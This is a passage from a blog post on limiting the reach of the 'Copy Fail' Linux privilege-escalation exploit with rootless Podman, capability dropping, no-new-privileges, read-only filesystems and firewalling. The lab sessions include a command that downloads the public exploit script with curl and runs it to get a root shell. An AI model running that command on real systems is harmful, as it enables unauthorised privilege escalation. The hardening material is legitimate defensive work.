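As far as I understand it, this flag sets the kernel's no_new_privs attribute on the container process. With that attribute set, execve no longer honours setuid bits or file capabilities, which would explain why su keeps running as foo. The kernel reports the attribute in the NoNewPrivs field of /proc/<pid>/status, and the sketch below reads it from a status dump. The sample text is made up for illustration.

```python
def no_new_privs(status_text: str) -> bool:
    """Return True when a /proc/<pid>/status dump has NoNewPrivs set to 1."""
    for line in status_text.splitlines():
        if line.startswith("NoNewPrivs:"):
            return line.split(":", 1)[1].strip() == "1"
    raise KeyError("NoNewPrivs field not found")


# Illustrative excerpt only, not copied from a real process.
SAMPLE_STATUS = "Name:\tbash\nUid:\t1002\t1002\t1002\t1002\nNoNewPrivs:\t1\nSeccomp:\t2\n"

if __name__ == "__main__":
    print(no_new_privs(SAMPLE_STATUS))  # True
```

Inside a running container you could feed it the contents of /proc/self/status instead of the sample.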

Rootless non-root while dropping capabilities

We saw earlier that we can use --cap-drop=all to drop all capabilities upon starting the container process. Would this impede the exploit somehow, given that foo has no capabilities to begin with?

bar@debian:~$ podman run --rm -it --name copyfail --cap-drop=all -v ./test:/test:rw localhost/copyfail /bin/bash
foo@21e516acea41:/var/www/html$ cd /tmp
foo@21e516acea41:/tmp$ curl -o copy_fail_exp.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/8e918b538783f64cb812fab3e8a784b0b13c6c94/copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   732  100   732    0     0   2500      0 --:--:-- --:--:-- --:--:--  2498
foo@21e516acea41:/tmp$ python3 copy_fail_exp.py && su
$ id
uid=1002(foo) gid=1002(foo) groups=1002(foo)
$ sleep 60

Let’s check the container processes:

bar@debian:~$ podman top copyfail huser,user,pid,args,capeff
HUSER       USER        PID         COMMAND                    EFFECTIVE CAPS
166537      foo         1           /bin/bash                  none
166537      foo         6           python3 copy_fail_exp.py   none
166537      foo         7           sh -c -- su                none
166537      foo         8           [sh]                       none
166537      foo         10          sleep 60                   none

Once again, the exploit failed to yield a root shell, and our processes are still without capabilities. foo is also limited to reading its own files:

$ cat /test/*.txt
cat: /test/bar.txt: Permission denied
I am foo
cat: /test/root.txt: Permission denied

This is akin to the result of the previous test, and these two measures can be combined to effectively limit capabilities.
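
A small helper makes it harder to forget either flag when launching containers from a script. This is a sketch and not a Podman API: the function name and its parameters are my own, and it only assembles the command line with the two flags tested above without running anything.

```python
import shlex


def hardened_run_args(image, name, command=(), volumes=()):
    """Build a podman run command that drops all capabilities and
    disables new privileges. The command is returned, not executed."""
    args = [
        "podman", "run", "--rm", "-it",
        "--name", name,
        "--cap-drop=all",
        "--security-opt=no-new-privileges",
    ]
    for volume in volumes:
        args += ["-v", volume]
    args.append(image)
    args += list(command)
    return args


if __name__ == "__main__":
    args = hardened_run_args(
        "localhost/copyfail:latest",
        "copyfail",
        command=["/bin/bash"],
        volumes=["./test:/test:rw"],
    )
    print(shlex.join(args))
```

The resulting list can be passed to subprocess.run as is, which avoids shell quoting issues.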

The exploit persists

We’ve limited the immediate effects of the exploit, by way of impeding a root shell with capabilities in the container. Nonetheless, the exploit was still effective.

If I run another container without the capabilities flags, I can assume container root by calling su as the unprivileged container user:

bar@debian:~$ podman run --rm -it --name copyfail -v ./test:/test:rw localhost/copyfail /bin/bash
foo@1eccd04fd2bd:/var/www/html$ su
# id
uid=0(root) gid=1002(foo) groups=1002(foo)

Hence, you should still patch your kernel and reboot.

Defence in depth

All in all, this is quite the exploit. A Remote Code Execution (RCE) vulnerability could be used to run Copy Fail and thus obtain privileged root inside the container, regardless of it being rootless. A compromised container can be used to bootstrap all kinds of attacks.

Fortunately, we are able to limit exposure by dropping capabilities and disabling new privileges upon the container’s start.

We can practice defence in depth and apply other tools at our disposal to further limit the exposure to a compromise of this kind.

Read-only images

You can add the --read-only flag to podman run so that the container root filesystem is mounted as read-only. Podman still defaults to mounting some writeable directories such as /tmp, /run, and /var/tmp. You need to add the --read-only-tmpfs=false flag as well to make the container completely read-only.

No writes to the system would be allowed in the event of a compromise of a read-only container. This would limit certain kinds of attacks post-exploit but not impede the exploit itself as you can still pipe the output of curl to python3.

Now, the ability to use these flags depends on how your container processes work. We can safely use these in our example because our python3 HTTP server does not need to write to the filesystem. However, most pre-built images out there assume write access to certain directories and may fail to work correctly in a read-only root filesystem.

It should be noted that the read-only root filesystem is independent of any writeable volumes that you attach to the container. Those volumes can still be written to in the event of a compromise.


bar@debian:~$ podman run --rm -it --name copyfail --read-only --read-only-tmpfs=false -v ./test:/test:rw localhost/copyfail:latest /bin/bash
foo@be21db39a7fb:/var/www/html$ touch /test/foo2.txt
foo@be21db39a7fb:/var/www/html$ touch /tmp/test.txt
touch: cannot touch '/tmp/test.txt': Read-only file system
foo@be21db39a7fb:/var/www/html$ touch $HOME/test.txt
touch: cannot touch '/var/lib/foo/test.txt': Read-only file system
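
For images that do need a writable scratch directory, one option is to keep the root filesystem read-only and mount a small tmpfs only where writes are required. The sketch below is an illustration under assumptions: the path /var/cache/app and the 16 MB size are hypothetical and do not come from the example image. It prints the command for review instead of running it.

```shell
#!/bin/sh
# Assumption: /var/cache/app is the only directory the process must write to.
# Both the path and the size are placeholders for illustration.
SCRATCH_DIR=/var/cache/app
SCRATCH_OPTS=rw,noexec,nosuid,nodev,size=16m

CMD="podman run --rm -it --name copyfail \
--read-only --read-only-tmpfs=false \
--tmpfs $SCRATCH_DIR:$SCRATCH_OPTS \
localhost/copyfail:latest /bin/bash"

# Print the command for review; run it with: eval "$CMD"
echo "$CMD"
```

Mounting the scratch directory with noexec means that a binary dropped there cannot be executed directly, although an interpreter such as python3 can still read scripts from it.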

Resource constraints

Both Docker and Podman support limiting the resources available to containers using cgroups. Containers don’t need unlimited memory, CPU, or PIDs. You can examine your container’s resource usage using podman stats and then apply limits accordingly.
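
As a minimal sketch, limits can be passed directly to podman run. The values below are placeholders chosen for illustration, not recommendations; in a rootless setup they also depend on cgroups v2 and on which controllers are delegated to your user, so treat this as something to verify on your own host. The script prints the command instead of running it.

```shell
#!/bin/sh
# Placeholder limits for illustration; derive real values from `podman stats`.
MEMORY_LIMIT=256m   # hard memory cap for the container
CPU_LIMIT=0.5       # at most half of one CPU
PIDS_LIMIT=64       # maximum number of processes, which blunts fork bombs

CMD="podman run --rm -it --name copyfail \
--memory=$MEMORY_LIMIT --cpus=$CPU_LIMIT --pids-limit=$PIDS_LIMIT \
localhost/copyfail:latest /bin/bash"

# Print the command for review; run it with: eval "$CMD"
echo "$CMD"
```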

Limit available binaries

We based our container image off of ubuntu to keep this exercise simple. The ubuntu image includes a lot of binaries that are available to an attacker in the event of a compromise. These binaries, however, are not necessary to run our humble HTTP server.

You should consider running an image that is as slim as possible at runtime. We could have used a multi-stage build to separate the container’s build-time and runtime environments. Alternatively, we could base it on a smaller purpose-built image such as the python3 image, or use an overall leaner distribution such as the -slim variants of Debian or even alpine.

Lastly, so long as it is compatible with your container process, you could go even further and use distroless images or scratch for a runtime without shells, package managers, and system utilities.

Firewalling

You can firewall off the container’s process using iptables or nftables. Limit incoming and outgoing connections to only what’s strictly necessary for the container process. Our HTTP example needs neither DNS nor connections to any local or remote server, so why not limit TCP packets to only those that belong to an established incoming connection?
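
One possible way to express this with nftables is sketched below. It rests on an assumption that is not from the tests above: that traffic from a rootless container leaves the host through sockets owned by the unprivileged user running it, so it can be matched by UID. The UID 1001 and the table name copyfail_egress are hypothetical. The script only prints the ruleset so that it can be reviewed before anything is applied.

```shell
#!/bin/sh
# Sketch only: emits an nftables ruleset for review instead of applying it.
# CONTAINER_UID is a hypothetical value: the host UID of the unprivileged
# user that runs the rootless container (check with `id -u bar`).
CONTAINER_UID=1001

RULESET=$(cat <<EOF
table inet copyfail_egress {
  chain output {
    type filter hook output priority 0; policy accept;
    # Replies on connections that a client opened towards the published port.
    meta skuid $CONTAINER_UID ct state established,related accept
    # Everything else this user tries to originate, including DNS lookups.
    meta skuid $CONTAINER_UID drop
  }
}
EOF
)

echo "$RULESET"
# To apply as root after reviewing: echo "$RULESET" | nft -f -
```

Keep in mind that rules like these apply to everything that user runs on the host, including podman pull, so images would need to be pulled before the rules are loaded or by other means. Test the behaviour with your own network backend before relying on it.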

Conclusion

I hope this proves to be an adequate overview of Podman rootless containers, and of how they can be used to limit exposure when a container is compromised by exploits such as Copy Fail. As stated, rootless containers are not immune to this exploit, but they can and should be configured in a way that curtails subsequent attacks.

At this point it should be clear that a standard Podman rootless container provides better isolation affordances than a standard Docker container setup. While Docker can be configured to run rootless and to use an unprivileged user namespace, it involves significantly more effort to do so than using Podman, due in part to a fundamental difference in its architecture.

Docker remains quite a popular choice for running containers, and many tools in the self-hosting ecosystem (e.g. Dokku, Kamal, Coolify, Dokploy) default to using it. I suspect that a lot of services out there are running with a broader attack surface than is actually necessary, by way of running images off of Docker Hub without scrutinizing the underlying image and taking measures to lock it down. Hopefully, this article inspires some to try rootless Podman or at least improve their Docker setups.

Ultimately, this highlights the importance of understanding the implementation details of the image that your container runs. You should know which user or users run the container processes, what directories of the root filesystem they depend on, and which Linux capabilities (or lack thereof) they need to deliver on their promise. Knowing these details, you can use and combine several mechanisms afforded by Podman and containers at large to harden the container and limit the blast radius if compromised.

Nonetheless, it is worth reiterating that, depending on your workloads, you should not depend on containers as the sole security boundary. You can combine containers and separate machines (virtual or physical) to great effect. That said, Podman does provide a way to isolate workloads within the same host by running each as a discrete unprivileged user with its own user namespace.

I will publish an update if I come across more information about Copy Fail that is specific to the topics discussed here. I’d be glad to receive any feedback, particularly if you noticed an omission or error on my part.

Further reading